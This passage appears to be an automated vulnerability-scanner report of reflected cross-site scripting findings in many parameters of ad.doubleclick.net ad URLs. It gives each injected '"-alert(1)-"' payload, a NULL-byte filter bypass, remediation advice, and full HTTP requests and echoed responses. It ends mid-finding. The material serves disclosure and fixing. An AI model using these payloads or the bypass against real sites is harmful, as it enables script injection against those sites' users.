The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00c801b"-alert(1)-"acd16220e0c was submitted in the oepartner parameter. This input was echoed as c801b"-alert(1)-"acd16220e0c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=%00c801b"-alert(1)-"acd16220e0c&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... /41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=%00c801b"-alert(1)-"acd16220e0c&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0 ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e14e"-alert(1)-"ff222b8ffeb was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=2e14e"-alert(1)-"ff222b8ffeb&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 7/%2a/z%3B240123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=2e14e"-alert(1)-"ff222b8ffeb&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11 ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f40e8"-alert(1)-"168af111c1f was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100f40e8"-alert(1)-"168af111c1f&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 0123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100f40e8"-alert(1)-"168af111c1f&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index. ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0042f87"-alert(1)-"8498af5b338 was submitted in the pt parameter. This input was echoed as 42f87"-alert(1)-"8498af5b338 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=%0042f87"-alert(1)-"8498af5b338&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 3Dv8/3af6/17/126/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=%0042f87"-alert(1)-"8498af5b338&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_ ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0061853"-alert(1)-"3d4531fc5aa was submitted in the rqid parameter. This input was echoed as 61853"-alert(1)-"3d4531fc5aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E%0061853"-alert(1)-"3d4531fc5aa&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 0/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E%0061853"-alert(1)-"3d4531fc5aa&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA") ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0030da6"-alert(1)-"9f29d88889c was submitted in the sg parameter. This input was echoed as 30da6"-alert(1)-"9f29d88889c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741%0030da6"-alert(1)-"9f29d88889c&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... ape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/12a/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741%0030da6"-alert(1)-"9f29d88889c&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.2 ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 592c7"-alert(1)-"714a4705579 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00592c7"-alert(1)-"714a4705579&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 53A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00592c7"-alert(1)-"714a4705579&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22207"-alert(1)-"42033c76780 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=5522207"-alert(1)-"42033c76780&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85b43"-alert(1)-"5c6dd508a9d was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=085b43"-alert(1)-"5c6dd508a9d&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7dfb5"-alert(1)-"406b18d8a5c was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=7dfb5"-alert(1)-"406b18d8a5c&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page ...[SNIP]... 230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=7dfb5"-alert(1)-"406b18d8a5c&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcal ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ba13"-alert(1)-"266cdf29ddf was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=1ba13"-alert(1)-"266cdf29ddf&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page ...[SNIP]... &sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=1ba13"-alert(1)-"266cdf29ddf&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; v ...[SNIP]...
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a000c"-alert(1)-"a796382a003 was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=a000c"-alert(1)-"a796382a003&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56f8d"-alert(1)-"1d00a0e4e7e was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
